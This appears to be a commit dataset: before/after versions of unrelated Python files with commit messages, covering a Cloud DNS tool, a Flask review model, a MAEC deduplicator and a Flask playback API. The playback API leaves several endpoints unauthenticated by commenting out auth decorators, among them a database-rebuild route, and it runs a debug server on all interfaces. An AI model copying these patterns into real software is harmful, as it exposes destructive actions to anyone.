        while changes.status != 'done':
            time.sleep(1)
            changes.reload()
        records = zone.list_resource_record_sets()
        log_records = [(record.name, record.record_type, record.ttl, record.rrdatas)
                       for record in records]
        return log_records
    except Exception:
        # Bug fix: was `except BaseException`, which also swallowed
        # KeyboardInterrupt/SystemExit raised while polling.
        return "the record %s already exists" % record_name
if __name__ == '__main__':
    parser = ArgumentParser()
    parser.add_argument('-f', '--file', help="your json file", required=True)
    args = parser.parse_args()
    if args.file:
        with open(args.file, 'r') as f:
            data = json.load(f)
            # Create the zone first if it does not exist yet.
            if check_zone(name=data['name']) is not True:
                create_zone(name=data['name'],
                            dns_name=data['zone'],
                            description=data['description'])
            # Then create every record listed in the JSON file.
            # Fix: iterate the records directly instead of the
            # `for reg in range(len(...))` index anti-pattern.
            for record in data['records']:
                create_record(name=data['name'],
                              dns_name=data['zone'],
                              record_name=record['name'],
                              record_type=record['type'],
                              ttl=record['ttl'],
                              value=record['value'])
change requeriments to requirements
"""Google Cloud Platform DNS Tool
This is an open source tool to management domains
in Google Cloud DNS using JSON files as reference
more informations please consulte the README.md
"""
import json
import time
from argparse import ArgumentParser
# Fail fast with a helpful message if the google-cloud-dns client library
# is not installed.
try:
    from google.cloud import dns
except ImportError:
    # Bug fix: the message said "requiriments.txt"; the file is requirements.txt.
    print('please check the requirements.txt and README.md')
    exit()
def client_conn(project_id=None):
    """Open a connection to the Google Cloud DNS API.

    :param project_id: Google Cloud Platform project id; ``None`` lets the
        client library pick the environment's default project
    :returns: a ``dns.Client`` connection object
    """
    return dns.Client(project=project_id)
def check_zone(name):
    """Check whether a managed zone with the given name already exists.

    :param name: name of the zone to look for
    :returns: True if a zone with that name exists, False otherwise
    """
    client = client_conn()
    for zone in client.list_zones():
        if zone.name == name:
            return True
    # Bug fix: previously fell off the end and returned None implicitly,
    # contradicting the documented boolean contract.
    return False
def create_zone(name, dns_name, description):
    """Create a new managed zone.

    :param name: a name of the new zone
    :param dns_name: domain of this zone, don't forget final point '.'
    :param description: a description about this zone or ""
    :returns: a false if not created or true
    """
    new_zone = client_conn().zone(name=name,
                                  dns_name=dns_name,
                                  description=description)
    new_zone.create()
    return new_zone.exists()
def create_record(name, dns_name, record_name, record_type, ttl, value):
    """Create a new record in an existing zone.

    :param name: a name of zone
    :param dns_name: domain of the zone
    :param record_name: reference of the new record, for example:
                        'record_name'.zone-domain.extension
    :param record_type: type of record on DNS, for example:
                        'A', 'AAAA', 'CAA', 'CNAME', 'MX', 'NAPTR',
                        'NS', 'PTR', 'SPF', 'SRV' & 'TXT'
    :param ttl: ttl in seconds as an int (not string), e.g. 3600
    :param value: any value of record single or multiple,
                  for example: ["value"] or ["8.8.8.8", "8.8.4.4"]
    :returns: log_records with all records about this zone, or an error
              message string when the change could not be applied
    """
    client = client_conn()
    zone = client.zone(name=name, dns_name=dns_name)
    record_set = zone.resource_record_set(record_name, record_type, ttl, value)
    changes = zone.changes()
    changes.add_record_set(record_set)
    try:
        changes.create()
        # Poll until the change set has been applied server-side.
        while changes.status != 'done':
            time.sleep(1)
            changes.reload()
        records = zone.list_resource_record_sets()
        log_records = [(record.name, record.record_type, record.ttl, record.rrdatas)
                       for record in records]
        return log_records
    except Exception:
        # Bug fix: was `except BaseException`, which also swallowed
        # KeyboardInterrupt/SystemExit raised while polling.
        return "the record %s already exists" % record_name
if __name__ == '__main__':
    parser = ArgumentParser()
    parser.add_argument('-f', '--file', help="your json file", required=True)
    args = parser.parse_args()
    if args.file:
        with open(args.file, 'r') as f:
            data = json.load(f)
            # Create the zone first if it does not exist yet.
            if check_zone(name=data['name']) is not True:
                create_zone(name=data['name'],
                            dns_name=data['zone'],
                            description=data['description'])
            # Then create every record listed in the JSON file.
            # Fix: iterate the records directly instead of the
            # `for reg in range(len(...))` index anti-pattern.
            for record in data['records']:
                create_record(name=data['name'],
                              dns_name=data['zone'],
                              record_name=record['name'],
                              record_type=record['type'],
                              ttl=record['ttl'],
                              value=record['value'])
|
from app import db
from flask import Response, json
from flask.ext.login import current_user
from sqlalchemy.orm import validates
from app.api.errors.errors import Error
from app.api.validators.number import NumberValidator
from app.api.models.user import User
from app.api.models.dish import Dish
import datetime
class Review(db.Model):
    """A user's review of a dish: 1-5 rating plus free-text content."""
    __tablename__ = 'review'
    id = db.Column('id', db.Integer, primary_key=True)
    user_id = db.Column('user_id', db.Integer)
    dish_id = db.Column('dish_id', db.Integer)
    content = db.Column('content', db.String(255))
    rating = db.Column('rating', db.Integer)
    date_created = db.Column('date_created', db.DateTime, default=datetime.datetime.now)
    date_updated = db.Column('date_updated', db.DateTime, onupdate=datetime.datetime.now)

    def __init__(self, content=None, rating=None, user_id=None, dish_id=None):
        self.content = content
        self.rating = rating
        self.user_id = user_id
        self.dish_id = dish_id

    def __repr__(self):
        # Bug fix: the model has no `name` attribute, so the old
        # `self.name` raised AttributeError whenever a Review was repr()'d.
        return '<Review %r>' % self.id

    @staticmethod
    def getExclude():
        """Column names to exclude from serialization (none).

        Fix: was declared without `self` and without @staticmethod, so
        calling it on an instance raised TypeError.
        """
        return []

    @validates('user_id')
    def validate_user_id(self, key, user_id):
        """Require an integer user_id that references an existing User."""
        if not NumberValidator.is_int(user_id):
            raise Error(name='user_id', message='Not a valid user id')
        if User.query.get(user_id) is None:
            raise Error(name='user_id', message='Could not find user with user id %r' % user_id)
        return user_id

    @validates('dish_id')
    def validate_dish_id(self, key, dish_id):
        """Require an integer dish_id that references an existing Dish."""
        if not NumberValidator.is_int(dish_id):
            raise Error(name='dish_id', message='Not a valid dish id')
        if Dish.query.get(dish_id) is None:
            raise Error(name='dish_id', message='Could not find dish with dish id %r' % dish_id)
        return dish_id

    @validates('rating')
    def validate_rating(self, key, rating):
        """Require a rating between 1 and 5 inclusive."""
        if not NumberValidator.between(1, 5, rating):
            raise Error(name='rating', message='Number must be between 1 and 5')
        return rating

    @staticmethod
    def post_single_preprocessor(data=None, **kw):
        """Stamp the authenticated user's id onto incoming POST data."""
        data['user_id'] = current_user.id
        return data
Preprocessor review
import datetime
import flask
from flask.ext.login import current_user
from flask.ext.restless import ProcessingException
from sqlalchemy.orm import validates
from app import db
from app.api.errors.errors import Error
from app.api.validators.number import NumberValidator
from app.api.models.user import User
from app.api.models.dish import Dish
class Review(db.Model):
    """A user's review of a dish: 1-5 rating plus free-text content.

    One review per (user, dish) pair is enforced in post_single_preprocessor.
    """
    __tablename__ = 'review'
    id = db.Column('id', db.Integer, primary_key=True)
    user_id = db.Column('user_id', db.Integer)
    dish_id = db.Column('dish_id', db.Integer)
    content = db.Column('content', db.String(255))
    rating = db.Column('rating', db.Integer)
    date_created = db.Column('date_created', db.DateTime, default=datetime.datetime.now)
    date_updated = db.Column('date_updated', db.DateTime, onupdate=datetime.datetime.now)

    def __init__(self, content=None, rating=None, user_id=None, dish_id=None):
        self.content = content
        self.rating = rating
        self.user_id = user_id
        self.dish_id = dish_id

    def __repr__(self):
        # Bug fix: the model has no `name` attribute, so the old
        # `self.name` raised AttributeError whenever a Review was repr()'d.
        return '<Review %r>' % self.id

    @staticmethod
    def getExclude():
        """Column names to exclude from serialization (none).

        Fix: was declared without `self` and without @staticmethod, so
        calling it on an instance raised TypeError.
        """
        return []

    @validates('user_id')
    def validate_user_id(self, key, user_id):
        """Require an integer user_id that references an existing User."""
        if not NumberValidator.is_int(user_id):
            raise Error(name='user_id', message='Not a valid user id')
        if User.query.get(user_id) is None:
            raise Error(name='user_id', message='Could not find user with user id %r' % user_id)
        return user_id

    @validates('dish_id')
    def validate_dish_id(self, key, dish_id):
        """Require an integer dish_id that references an existing Dish."""
        if not NumberValidator.is_int(dish_id):
            raise Error(name='dish_id', message='Not a valid dish id')
        if Dish.query.get(dish_id) is None:
            raise Error(name='dish_id', message='Could not find dish with dish id %r' % dish_id)
        return dish_id

    @validates('rating')
    def validate_rating(self, key, rating):
        """Require a rating between 1 and 5 inclusive."""
        if not NumberValidator.between(1, 5, rating):
            raise Error(name='rating', message='Number must be between 1 and 5')
        return rating

    @validates('content')
    def validate_content(self, key, content):
        """Require review text of at least 10 characters."""
        if len(content) < 10:
            raise Error(name='content', message='Review must be longer than or equal to 10 characters')
        return content

    @staticmethod
    def post_single_preprocessor(data=None, **kw):
        """Stamp the authenticated user's id onto incoming POST data,
        rejecting the request if this user already reviewed this dish."""
        getReview = Review.query.filter(Review.user_id == current_user.id, Review.dish_id == data['dish_id']).first()
        if getReview is not None:
            raise ProcessingException(
                description='A review was already found for this user and dish: Review with ID %r' % getReview.id,
                code=400
            )
        data['user_id'] = current_user.id
        return data
|
# MAEC Bundle Deduplicator Module
# Last updated: 12/3/2013
import collections
import cybox
import sets
import copy
from cybox.common.properties import BaseProperty
class BundleDeduplicator(object):
    """Deduplicates Objects inside a MAEC Bundle.

    Objects with the same xsi:type and identical comparable property values
    are collapsed: one copy is kept in a "Deduplicated Objects" collection
    and every other occurrence is rewritten as an IDREF to it.

    NOTE(review): working state is stored on the class itself
    (cls.objects_dict / cls.object_ids_mapping), so concurrent
    deduplicate() calls would interfere -- confirm single-threaded use.
    """

    @classmethod
    def deduplicate(cls, bundle):
        """Deduplicate the input Bundle in place."""
        # Dictionary of all unique objects
        # Key = object type (xsi:type)
        # Value = dictionary of unique objects for that type
        #   Key = unique object id
        #   Value = object values, as a set
        cls.objects_dict = {}
        # Dictionary of non-unique -> unique Object ID mappings
        cls.object_ids_mapping = {}
        # Get all Objects in the Bundle
        all_objects = bundle.get_all_objects(include_actions=True)
        # Perform the Object mapping
        cls.map_objects(all_objects)
        # Do the actual deduplication if duplicate objects were found
        if cls.object_ids_mapping:
            # Next, add the unique objects to their own collection
            cls.handle_unique_objects(bundle, all_objects)
            # Replace the non-unique Objects with references
            # to unique Objects across the entire Bundle
            cls.handle_duplicate_objects(bundle, all_objects)
            # Finally, perform some cleanup to handle strange
            # cases where you may have Objects pointing to each other
            cls.cleanup(bundle)

    # Cleanup and remove any Objects that may be referencing the re-used Objects.
    # Otherwise, this can create Object->Object->Object etc. references which don't make sense
    @classmethod
    def cleanup(cls, bundle):
        """Remove Objects that are now bare references to deduplicated Objects."""
        # Cleanup the root-level Objects
        if bundle.objects:
            # List of Objects to remove
            objs = [x for x in bundle.objects if (x.idref and x.idref in cls.object_ids_mapping.values())]
            # Remove the extraneous Objects
            for obj in objs:
                bundle.objects.remove(obj)
        # Cleanup the Object Collections
        if bundle.collections and bundle.collections.object_collections:
            for collection in bundle.collections.object_collections:
                # Ignore the re-used objects collection
                if collection.name and collection.name == "Deduplicated Objects":
                    continue
                # List of Objects to remove
                objs = [x for x in collection.object_list if (x.idref and x.idref in cls.object_ids_mapping.values())]
                for obj in objs:
                    collection.object_list.remove(obj)

    # Replace all of the duplicate Objects with references to
    # the unique object placed in the "Re-used Objects" Collection
    @classmethod
    def handle_duplicate_objects(cls, bundle, all_objects):
        """Rewrite every duplicate Object as an IDREF to its unique counterpart."""
        for duplicate_object_id, unique_object_id in cls.object_ids_mapping.items():
            for object in all_objects:
                if object.id_ == duplicate_object_id or object.idref == duplicate_object_id:
                    # Modify the existing Object to serve as a reference to
                    # the unique Object in the collection
                    object.idref = unique_object_id
                    object.id_ = None
                    object.properties = None
                    object.related_objects = None
                    object.domain_specific_object_properties = None

    # Add a new Object collection to the Bundle for storing the unique Objects
    # Add the Objects to said collection
    @classmethod
    def handle_unique_objects(cls, bundle, all_objects):
        """Create the "Deduplicated Objects" collection and populate it."""
        # First, find the ID of the last Object Collection (if applicable)
        counter = 1
        if bundle.collections and bundle.collections.object_collections:
            for object_collection in bundle.collections.object_collections:
                counter += 1
        # Find the namespace used in the Bundle IDs
        bundle_namespace = bundle.id.split('-')[1]
        # Build the collection ID
        collection_id = "maec-" + bundle_namespace + "-objc-" + str(counter)
        # Add the named Object collection
        bundle.add_named_object_collection("Deduplicated Objects", collection_id)
        # Add the unique Objects to the collection
        cls.add_unique_objects(bundle, all_objects)

    # Add the unique Objects to the collection and perform the properties replacement
    @classmethod
    def add_unique_objects(cls, bundle, all_objects):
        """Copy each unique Object into the collection and turn the original into an IDREF."""
        added_ids = []
        for unique_object_id in cls.object_ids_mapping.values():
            if unique_object_id not in added_ids:
                for object in all_objects:
                    if object.id_ and object.id_ == unique_object_id:
                        object_copy = copy.deepcopy(object)
                        # Strip context-specific wrapper fields from the copy
                        if isinstance(object_copy, cybox.core.AssociatedObject):
                            object_copy.association_type = None
                        elif isinstance(object_copy, cybox.core.RelatedObject):
                            object_copy.relationship = None
                        # Modify the existing Object to serve as a reference to the Object in the collection
                        object.idref = object.id_
                        object.id_ = None
                        object.properties = None
                        object.related_objects = None
                        object.domain_specific_object_properties = None
                        # Add the unique Object to the collection
                        bundle.add_object(object_copy, "Deduplicated Objects")
                        # Break out of the all_objects loop
                        break
                added_ids.append(unique_object_id)

    # Map the non-unique Objects to their unique (first observed) counterparts
    @classmethod
    def map_objects(cls, all_objects):
        """Build the non-unique -> unique Object ID mapping."""
        # Do the object mapping
        for obj in all_objects:
            matching_object_id = cls.find_matching_object(obj)
            if matching_object_id:
                cls.object_ids_mapping[obj.id_] = matching_object_id

    # Returns the value contained in a TypedField or its nested members, if applicable
    @classmethod
    def get_typedfield_values(cls, val, name, values, ignoreCase = False):
        """Recursively collect "path:value" strings from a TypedField into `values`."""
        # If it's a BaseProperty instance, then we're done. Return it.
        if isinstance(val, BaseProperty):
            if ignoreCase:
                values.add(name + ":" + str(val))
            else:
                values.add(name + ":" + str(val).lower())
        # If it's a list, then we need to iterate through each of its members
        elif isinstance(val, collections.MutableSequence):
            for list_item in val:
                for list_item_property in list_item._get_vars():
                    cls.get_typedfield_values(getattr(list_item, str(list_item_property)), name + "/" + str(list_item_property), values, ignoreCase)
        # If it's a cybox.Entity, then we need to iterate through its properties
        elif isinstance(val, cybox.Entity):
            for item_property in val._get_vars():
                cls.get_typedfield_values(getattr(val, str(item_property)), name + "/" + str(item_property), values, ignoreCase)

    # Get the values specified for an object's properties as a set
    @classmethod
    def get_object_values(cls, obj, ignoreCase = False):
        """Return the set of comparable property values for an Object."""
        values = set()
        for typed_field in obj.properties._get_vars():
            # Make sure the typed field is comparable
            if typed_field.comparable:
                val = getattr(obj.properties, str(typed_field))
                if val is not None:
                    cls.get_typedfield_values(val, str(typed_field), values, ignoreCase)
        return values

    # Find a matching object, if it exists
    @classmethod
    def find_matching_object(cls, obj):
        """Return the id of an already-seen identical Object, else record this one and return None."""
        if obj and obj.properties:
            object_values = cls.get_object_values(obj)
            xsi_type = obj.properties._XSI_TYPE
            if xsi_type and xsi_type in cls.objects_dict:
                types_dict = cls.objects_dict[xsi_type]
                # See if we already have an identical object in the dictionary
                for obj_id, obj_values in types_dict.items():
                    if obj_values == object_values:
                        # If so, return its ID for use in the IDREF
                        return obj_id
                # If not, add it to the dictionary
                types_dict[obj.id_] = object_values
            elif xsi_type and xsi_type not in cls.objects_dict:
                types_dict = {obj.id_:object_values}
                cls.objects_dict[xsi_type] = types_dict
        return None
Added proper docstrings for all methods
# MAEC Bundle Deduplicator Module
# Last updated: 12/3/2013
import collections
import cybox
import sets
import copy
from cybox.common.properties import BaseProperty
class BundleDeduplicator(object):
    """Deduplicates Objects inside a MAEC Bundle.

    Objects with the same xsi:type and identical comparable property values
    are collapsed: one copy is kept in a "Deduplicated Objects" collection
    and every other occurrence is rewritten as an IDREF to it.

    NOTE(review): working state is stored on the class itself
    (cls.objects_dict / cls.object_ids_mapping), so concurrent
    deduplicate() calls would interfere -- confirm single-threaded use.
    """

    @classmethod
    def deduplicate(cls, bundle):
        """Deduplicate the input Bundle."""
        # Dictionary of all unique objects
        # Key = object type (xsi:type)
        # Value = dictionary of unique objects for that type
        #   Key = unique object id
        #   Value = object values, as a set
        cls.objects_dict = {}
        # Dictionary of non-unique -> unique Object ID mappings
        cls.object_ids_mapping = {}
        # Get all Objects in the Bundle
        all_objects = bundle.get_all_objects(include_actions=True)
        # Perform the Object mapping
        cls.map_objects(all_objects)
        # Do the actual deduplication if duplicate objects were found
        if cls.object_ids_mapping:
            # Next, add the unique objects to their own collection
            cls.handle_unique_objects(bundle, all_objects)
            # Replace the non-unique Objects with references
            # to unique Objects across the entire Bundle
            cls.handle_duplicate_objects(bundle, all_objects)
            # Finally, perform some cleanup to handle strange
            # cases where you may have Objects pointing to each other
            cls.cleanup(bundle)

    @classmethod
    def cleanup(cls, bundle):
        """Cleanup and remove any Objects that may be referencing the re-used Objects.

        Otherwise, this can create Object->Object->Object etc. references which don't make sense."""
        # Cleanup the root-level Objects
        if bundle.objects:
            # List of Objects to remove
            objs = [x for x in bundle.objects if (x.idref and x.idref in cls.object_ids_mapping.values())]
            # Remove the extraneous Objects
            for obj in objs:
                bundle.objects.remove(obj)
        # Cleanup the Object Collections
        if bundle.collections and bundle.collections.object_collections:
            for collection in bundle.collections.object_collections:
                # Ignore the re-used objects collection
                if collection.name and collection.name == "Deduplicated Objects":
                    continue
                # List of Objects to remove
                objs = [x for x in collection.object_list if (x.idref and x.idref in cls.object_ids_mapping.values())]
                for obj in objs:
                    collection.object_list.remove(obj)

    @classmethod
    def handle_duplicate_objects(cls, bundle, all_objects):
        """Replace all of the duplicate Objects with references to the unique object placed in the "Deduplicated Objects" Collection."""
        for duplicate_object_id, unique_object_id in cls.object_ids_mapping.items():
            for object in all_objects:
                if object.id_ == duplicate_object_id or object.idref == duplicate_object_id:
                    # Modify the existing Object to serve as a reference to
                    # the unique Object in the collection
                    object.idref = unique_object_id
                    object.id_ = None
                    object.properties = None
                    object.related_objects = None
                    object.domain_specific_object_properties = None

    @classmethod
    def handle_unique_objects(cls, bundle, all_objects):
        """Add a new Object collection to the Bundle for storing the unique Objects,
        then add the Objects to that collection."""
        # First, find the ID of the last Object Collection (if applicable)
        counter = 1
        if bundle.collections and bundle.collections.object_collections:
            for object_collection in bundle.collections.object_collections:
                counter += 1
        # Find the namespace used in the Bundle IDs
        bundle_namespace = bundle.id.split('-')[1]
        # Build the collection ID
        collection_id = "maec-" + bundle_namespace + "-objc-" + str(counter)
        # Add the named Object collection
        bundle.add_named_object_collection("Deduplicated Objects", collection_id)
        # Add the unique Objects to the collection
        cls.add_unique_objects(bundle, all_objects)

    @classmethod
    def add_unique_objects(cls, bundle, all_objects):
        """Add the unique Objects to the collection and perform the properties replacement."""
        added_ids = []
        for unique_object_id in cls.object_ids_mapping.values():
            if unique_object_id not in added_ids:
                for object in all_objects:
                    if object.id_ and object.id_ == unique_object_id:
                        object_copy = copy.deepcopy(object)
                        # Strip context-specific wrapper fields from the copy
                        if isinstance(object_copy, cybox.core.AssociatedObject):
                            object_copy.association_type = None
                        elif isinstance(object_copy, cybox.core.RelatedObject):
                            object_copy.relationship = None
                        # Modify the existing Object to serve as a reference to the Object in the collection
                        object.idref = object.id_
                        object.id_ = None
                        object.properties = None
                        object.related_objects = None
                        object.domain_specific_object_properties = None
                        # Add the unique Object to the collection
                        bundle.add_object(object_copy, "Deduplicated Objects")
                        # Break out of the all_objects loop
                        break
                added_ids.append(unique_object_id)

    @classmethod
    def map_objects(cls, all_objects):
        """Map the non-unique Objects to their unique (first observed) counterparts."""
        # Do the object mapping
        for obj in all_objects:
            matching_object_id = cls.find_matching_object(obj)
            if matching_object_id:
                cls.object_ids_mapping[obj.id_] = matching_object_id

    @classmethod
    def get_typedfield_values(cls, val, name, values, ignoreCase = False):
        """Recursively collect "path:value" strings from a TypedField (or its
        nested members) into the `values` set."""
        # If it's a BaseProperty instance, then we're done. Return it.
        if isinstance(val, BaseProperty):
            if ignoreCase:
                values.add(name + ":" + str(val))
            else:
                values.add(name + ":" + str(val).lower())
        # If it's a list, then we need to iterate through each of its members
        # NOTE(review): collections.MutableSequence is removed in Python 3.10+;
        # collections.abc.MutableSequence is the modern spelling -- confirm
        # the targeted Python version before changing.
        elif isinstance(val, collections.MutableSequence):
            for list_item in val:
                for list_item_property in list_item._get_vars():
                    cls.get_typedfield_values(getattr(list_item, str(list_item_property)), name + "/" + str(list_item_property), values, ignoreCase)
        # If it's a cybox.Entity, then we need to iterate through its properties
        elif isinstance(val, cybox.Entity):
            for item_property in val._get_vars():
                cls.get_typedfield_values(getattr(val, str(item_property)), name + "/" + str(item_property), values, ignoreCase)

    @classmethod
    def get_object_values(cls, obj, ignoreCase = False):
        """Get the values specified for an Object's properties as a set."""
        values = set()
        for typed_field in obj.properties._get_vars():
            # Make sure the typed field is comparable
            if typed_field.comparable:
                val = getattr(obj.properties, str(typed_field))
                if val is not None:
                    cls.get_typedfield_values(val, str(typed_field), values, ignoreCase)
        return values

    @classmethod
    def find_matching_object(cls, obj):
        """Find a matching object, if it exists; otherwise record this one and return None."""
        if obj and obj.properties:
            object_values = cls.get_object_values(obj)
            xsi_type = obj.properties._XSI_TYPE
            if xsi_type and xsi_type in cls.objects_dict:
                types_dict = cls.objects_dict[xsi_type]
                # See if we already have an identical object in the dictionary
                for obj_id, obj_values in types_dict.items():
                    if obj_values == object_values:
                        # If so, return its ID for use in the IDREF
                        return obj_id
                # If not, add it to the dictionary
                types_dict[obj.id_] = object_values
            elif xsi_type and xsi_type not in cls.objects_dict:
                types_dict = {obj.id_:object_values}
                cls.objects_dict[xsi_type] = types_dict
        return None
|
from flask import Flask, request, abort, jsonify
from flask.ext.cors import CORS
from werkzeug.contrib.fixers import ProxyFix
from Models import *
import peewee
from uuid import uuid4
import hashlib
from nocache import nocache
from GeneralApiException import GeneralApiException
import UserApi
from AuthenticationApi import *
import SetUp
from SearchApi import youtubeSearch
from RegexApi import *
from ApiCalls import *
##################
## Server SetUp ##
##################
# Application wiring: database handle, Flask app, proxy fix and CORS.
db = peewee.PostgresqlDatabase('postgres', host='db', user='postgres')
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)  # trust X-Forwarded-* headers from the reverse proxy
CORS(app, headers=['Content-Type'])
app.hasSetConsume = False  # set consume mode once, the first time an add-song request is made
####################
## Errror Handler ##
####################
@app.errorhandler(GeneralApiException)
def handle_invalid_usage(error):
    """Serialize a GeneralApiException into a JSON response.

    NOTE(review): the response is sent with HTTP 200 even though it carries
    an error payload, so clients must inspect the body -- confirm intended.
    """
    response = jsonify(error.to_dict())
    response.status_code = 200
    return response
###########
## Users ##
###########
@app.route('/users/<string:key>')
@nocache
def getUser(key):
    """Fetch a user by key (delegates to UserApi)."""
    return UserApi.getUser(key)

@app.route('/user', methods=["POST"])
@nocache
@requireAdmin
def CreateUser():
    """Create a new user. Requires admin authentication.

    Example request body:
    {
        "username":"jdoe",
        "password":"boi",
        "firstName":"john",
        "lastName": "doe",
        "email": "jdoe@jdoe.com"
    }
    """
    return UserApi.createUser(request.json)

@app.route('/user/edit', methods=["POST"])
@nocache
@requireAuth
def EditUser():
    """Edit the current user's details. Requires authentication."""
    return UserApi.editUser(request.json)
####################
## Authentication ##
####################
@app.route('/authenticate', methods=["POST"])
@nocache
def Authentication():
    """Exchange a username/password for an auth token.

    Example request body:
    {
        "username":"jdoe",
        "password":"boi"
    }
    """
    return authentication(request.json)

@app.route('/authenticate/verify', methods=["POST"])
@nocache
def VerifyToken():
    """Verify that a user token is valid.

    Example request body:
    {
        "token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
    }
    """
    return jsonify({'result': validateAuthToken(request.json["token"], False)})

@app.route('/authenticate/verify/admin', methods=["POST"])
@nocache
def VerifyAdminToken():
    """Verify that a user token is a valid admin token.

    Example request body:
    {
        "token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
    }
    """
    return jsonify({'result': validateAuthToken(request.json["token"], True)})
############
## Search ##
############
@app.route('/search/<string:query>', methods=["GET"])
@nocache
@requireAuth
def Search(query):
    """Search YouTube for the given query string. Requires authentication."""
    return youtubeSearch(query)
#############
## Regexes ##
#############
@app.route('/regex/<string:key>', methods=["GET"])
@nocache
@requireAdmin
def GetRegex(key):
    """Fetch a stored regex by key. Requires admin authentication."""
    return getRegex(key)

@app.route('/regex', methods=["POST"])
@nocache
@requireAdmin
def AddRegex():
    """Store a new regex pattern. Requires admin authentication.

    Example request body:
    {
        "pattern":"a*b*c*"
    }
    """
    regex = addRegex(request.json["pattern"])
    return regex

@app.route('/regex', methods=["DELETE"])
@nocache
@requireAdmin
def RemoveRegex():
    """Delete a stored regex by key. Requires admin authentication.

    Example request body:
    {
        "key":"1234"
    }
    """
    return removeRegex(request.json["key"])
###############
## Api Calls ##
###############
@app.route('/playback/add', methods=["POST"])
@nocache
#@requireAuth
def AddSong():
    """Queue a song for playback. Requires authentication.

    NOTE(review): @requireAuth is commented out, so this endpoint is
    currently unauthenticated -- confirm intended.
    """
    song = request.json['song']
    if not app.hasSetConsume:
        # Enable consume mode once, on the first add request.
        setConsume()
        app.hasSetConsume = True
    return addSong(song)

@app.route('/playback/play', methods=["GET"])
@nocache
#@requireAdmin
def PlaySong():
    """Start playback. Requires admin authentication (currently disabled)."""
    return playSong()

@app.route('/playback/pause', methods=["GET"])
@nocache
#@requireAdmin
def PauseSong():
    """Pause playback. Requires admin authentication (currently disabled)."""
    return pauseSong()

@app.route('/playback/stop', methods=["GET"])
@nocache
@requireAdmin
def StopSong():
    """Stop playback. Requires admin authentication."""
    return stopSong()

@app.route('/playback/next', methods=["GET"])
@nocache
@requireAdmin
def NextSong():
    """Skip to the next song. Requires admin authentication."""
    return nextSong()

@app.route('/playback/clear', methods=["GET"])
@nocache
@requireAdmin
def ClearSongs():
    """Clear the playback queue. Requires admin authentication."""
    return clearSongs()

@app.route('/playback/list', methods=["GET"])
@nocache
@requireAdmin
def GetTracks():
    """List queued tracks. Requires admin authentication."""
    return getTracks()

@app.route('/playback/state', methods=["GET"])
@nocache
@requireAdmin
def GetState():
    """Return the current playback state. Requires admin authentication."""
    return getState()

@app.route('/volume/up', methods=["GET"])
@nocache
#@requireAdmin
def IncreaseVolume():
    """Raise the volume one step. Requires admin authentication (currently disabled)."""
    return increaseVolume()

@app.route('/volume/down', methods=["GET"])
@nocache
#@requireAdmin
def DecreaseVolume():
    """Lower the volume one step. Requires admin authentication (currently disabled)."""
    return decreaseVolume()

@app.route('/volume', methods=["GET"])
@nocache
#@requireAdmin
def GetVolume():
    """Return the current volume. Requires admin authentication (currently disabled)."""
    return jsonify(getVolume())

@app.route('/volume/<int:key>', methods=["GET"])
@nocache
#@requireAdmin
def SetVolume(key):
    """Set the volume to `key`. Requires admin authentication (currently disabled)."""
    return jsonify(setVolume(key))
####################
## Build Database ##
####################
@app.route('/buildDb')
@nocache
#@requireAdmin
def BuildDb():
    """Rebuild the database by delegating to SetUp.main().

    Requires admin authentication.
    NOTE(review): @requireAdmin is commented out, leaving a destructive
    endpoint unauthenticated -- confirm intended.
    """
    SetUp.main()
    return "Database rebuilt"

if __name__ == "__main__":
    # NOTE(review): debug=True enables the Werkzeug debugger/reloader --
    # must not be used in production.
    app.run(host='0.0.0.0', debug=True)
# fixed #13
from flask import Flask, request, abort, jsonify
from flask.ext.cors import CORS
from werkzeug.contrib.fixers import ProxyFix
from Models import *
import peewee
from uuid import uuid4
import hashlib
from nocache import nocache
from GeneralApiException import GeneralApiException
import UserApi
from AuthenticationApi import *
import SetUp
from SearchApi import youtubeSearch
from RegexApi import *
from SongApi import *
##################
## Server SetUp ##
##################
db = peewee.PostgresqlDatabase('postgres', host='db', user='postgres')
app = Flask(__name__)
# Trust X-Forwarded-* headers when running behind a reverse proxy.
app.wsgi_app = ProxyFix(app.wsgi_app)
CORS(app, headers=['Content-Type'])
app.hasSetConsume = False # set consume mode once, on the first add-song request
####################
## Error Handler  ##
####################
@app.errorhandler(GeneralApiException)
def handle_invalid_usage(error):
    """Serialize a GeneralApiException into a JSON response.

    NOTE(review): deliberately replies with HTTP 200 and the error
    payload in the body; clients must inspect the JSON, not the status.
    """
    response = jsonify(error.to_dict())
    response.status_code = 200
    return response
###########
## Users ##
###########
@app.route('/users/<string:key>')
@nocache
def getUser(key):
    """Return the user identified by *key*.  No authentication required."""
    return UserApi.getUser(key)
@app.route('/user', methods=["POST"])
@nocache
@requireAdmin
def CreateUser():
    """
    Create a new user.  Requires admin authentication.

    Example request body:
    {
        "username": "jdoe",
        "password": "boi",
        "firstName": "john",
        "lastName": "doe",
        "email": "jdoe@jdoe.com"
    }
    """
    return UserApi.createUser(request.json)
@app.route('/user/edit', methods=["POST"])
@nocache
@requireAuth
def EditUser():
    """Edit a user's details from the JSON body.  Requires authentication."""
    return UserApi.editUser(request.json)
####################
## Authentication ##
####################
@app.route('/authenticate', methods=["POST"])
@nocache
def Authentication():
    """
    Exchange credentials for an auth token.

    Example request body:
    {
        "username": "jdoe",
        "password": "boi"
    }
    """
    return authentication(request.json)
@app.route('/authenticate/verify', methods=["POST"])
@nocache
def VerifyToken():
    """
    Verify that a user token is valid.

    Example request body:
    {
        "token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
    }
    """
    return jsonify({'result': validateAuthToken(request.json["token"], False)})
@app.route('/authenticate/verify/admin', methods=["POST"])
@nocache
def VerifyAdminToken():
    """
    Verify that a user token is a valid admin token.

    Example request body:
    {
        "token": "83f72e63-2e9a-4bba-9b1f-f386f0c633c7"
    }
    """
    return jsonify({'result': validateAuthToken(request.json["token"], True)})
############
## Search ##
############
@app.route('/search/<string:query>', methods=["GET"])
@nocache
@requireAuth
def Search(query):
    """Search YouTube for *query*.  Requires authentication."""
    return youtubeSearch(query)
#############
## Regexes ##
#############
@app.route('/regex/<string:key>', methods=["GET"])
@nocache
@requireAdmin
def GetRegex(key):
    """Return the regex identified by *key*.  Requires admin authentication."""
    return getRegex(key)
@app.route('/regex', methods=["POST"])
@nocache
@requireAdmin
def AddRegex():
    """
    Store a new regex.  Requires admin authentication.

    Example request body:
    {
        "pattern": "a*b*c*"
    }
    """
